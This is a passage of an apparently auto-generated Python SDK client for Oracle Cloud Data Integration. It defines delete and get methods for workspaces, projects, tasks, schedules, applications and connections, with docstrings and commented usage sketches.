header_params=header_params)
def delete_pipeline_validation(self, workspace_id, pipeline_validation_key, **kwargs):
"""
Removes a pipeline validation using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str pipeline_validation_key: (required)
The key of the pipeline validation.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When `if-match` is provided and its value does not exactly match the `etag` of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_pipeline_validation.py.html>`__ to see an example of how to use the delete_pipeline_validation API.
"""
resource_path = "/workspaces/{workspaceId}/pipelineValidations/{pipelineValidationKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_pipeline_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"pipelineValidationKey": pipeline_validation_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_project(self, workspace_id, project_key, **kwargs):
"""
Removes a project from the workspace using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str project_key: (required)
The project key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When `if-match` is provided and its value does not exactly match the `etag` of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_project.py.html>`__ to see an example of how to use the delete_project API.
"""
resource_path = "/workspaces/{workspaceId}/projects/{projectKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_project got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"projectKey": project_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_schedule(self, workspace_id, application_key, schedule_key, **kwargs):
"""
Deletes a schedule using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str schedule_key: (required)
The schedule key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When `if-match` is provided and its value does not exactly match the `etag` of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_schedule.py.html>`__ to see an example of how to use the delete_schedule API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/schedules/{scheduleKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_schedule got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"scheduleKey": schedule_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_task(self, workspace_id, task_key, **kwargs):
"""
Removes a task using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When `if-match` is provided and its value does not exactly match the `etag` of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_task.py.html>`__ to see an example of how to use the delete_task API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_task got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
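# Sketch of the unknown-kwargs guard shared by these methods: any keyword
# outside expected_kwargs raises ValueError before any request is made. The
# keyword below is deliberately invalid; other values are placeholders.
#
#   try:
#       di_client.delete_task(
#           "ocid1.disworkspace.oc1..example",
#           "task-key",
#           not_a_real_option=True)
#   except ValueError as err:
#       print(err)  # delete_task got unknown kwargs: ['not_a_real_option']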
def delete_task_run(self, workspace_id, application_key, task_run_key, **kwargs):
"""
Deletes a task run using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str task_run_key: (required)
The task run key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When `if-match` is provided and its value does not exactly match the `etag` of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_task_run.py.html>`__ to see an example of how to use the delete_task_run API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskRuns/{taskRunKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_task_run got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"taskRunKey": task_run_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
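# Sketch of supplying a client-generated opc-request-id so a specific call can
# be cited when contacting Oracle, as the opc_request_id docs above suggest.
# The UUID is generated locally; all other values are placeholders.
#
#   import uuid
#
#   di_client.delete_task_run(
#       "ocid1.disworkspace.oc1..example",
#       "application-key",
#       "task-run-key",
#       opc_request_id=str(uuid.uuid4()))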
def delete_task_schedule(self, workspace_id, application_key, task_schedule_key, **kwargs):
"""
Deletes a task schedule using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str task_schedule_key: (required)
The task schedule key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When `if-match` is provided and its value does not exactly match the `etag` of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_task_schedule.py.html>`__ to see an example of how to use the delete_task_schedule API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskSchedules/{taskScheduleKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_task_schedule got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"taskScheduleKey": task_schedule_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_task_validation(self, workspace_id, task_validation_key, **kwargs):
"""
Removes a task validation using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str task_validation_key: (required)
The task validation key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When `if-match` is provided and its value does not exactly match the `etag` of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_task_validation.py.html>`__ to see an example of how to use the delete_task_validation API.
"""
resource_path = "/workspaces/{workspaceId}/taskValidations/{taskValidationKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_task_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskValidationKey": task_validation_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_workspace(self, workspace_id, **kwargs):
"""
Deletes a Data Integration workspace resource using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param int quiesce_timeout: (optional)
Used to set the timeout for Data Integration to gracefully close down any running jobs before stopping the workspace.
:param bool is_force_operation: (optional)
Used to forcefully close down the workspace.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When `if-match` is provided and its value does not exactly match the `etag` of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_workspace.py.html>`__ to see an example of how to use the delete_workspace API.
"""
resource_path = "/workspaces/{workspaceId}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"quiesce_timeout",
"is_force_operation",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_workspace got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"quiesceTimeout": kwargs.get("quiesce_timeout", missing),
"isForceOperation": kwargs.get("is_force_operation", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params)
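# Retry-override sketch (reusing the `client` from the earlier sketch): the
# per-call retry_strategy kwarg wins over any client-level strategy, matching
# the precedence logic in the method body. quiesce_timeout's unit is assumed
# to be seconds here; the docstring does not state it.
#
#     from oci.retry import DEFAULT_RETRY_STRATEGY, NoneRetryStrategy
#
#     # Retry transient failures for this call only...
#     client.delete_workspace(
#         workspace_id,
#         quiesce_timeout=300,
#         retry_strategy=DEFAULT_RETRY_STRATEGY)
#
#     # ...or, for another call, explicitly disable retries.
#     client.delete_workspace(workspace_id, retry_strategy=NoneRetryStrategy())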
def get_application(self, workspace_id, application_key, **kwargs):
"""
Retrieves an application using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Application`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_application.py.html>`__ to see an example of how to use the get_application API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_application got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Application")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Application")
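# Read sketch: every operation returns an :class:`~oci.response.Response`; its
# `data` attribute holds the deserialized model (an Application here) and its
# headers echo the opc-request-id, which is what you quote to Oracle support.
# Assumptions: `client` and `workspace_id` from the first sketch, a
# placeholder application key, and a `name` field on the Application model.
#
#     response = client.get_application(
#         workspace_id,
#         "example-application-key",
#         opc_request_id="my-trace-id-0001")
#     app = response.data
#     print(app.name, response.headers.get("opc-request-id"))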
def get_connection(self, workspace_id, connection_key, **kwargs):
"""
Retrieves the connection details using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str connection_key: (required)
The connection key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Connection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_connection.py.html>`__ to see an example of how to use the get_connection API.
"""
resource_path = "/workspaces/{workspaceId}/connections/{connectionKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_connection got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"connectionKey": connection_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Connection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Connection")
def get_connection_validation(self, workspace_id, connection_validation_key, **kwargs):
"""
Retrieves a connection validation using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str connection_validation_key: (required)
The key of the connection validation.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ConnectionValidation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_connection_validation.py.html>`__ to see an example of how to use the get_connection_validation API.
"""
resource_path = "/workspaces/{workspaceId}/connectionValidations/{connectionValidationKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_connection_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"connectionValidationKey": connection_validation_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="ConnectionValidation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="ConnectionValidation")
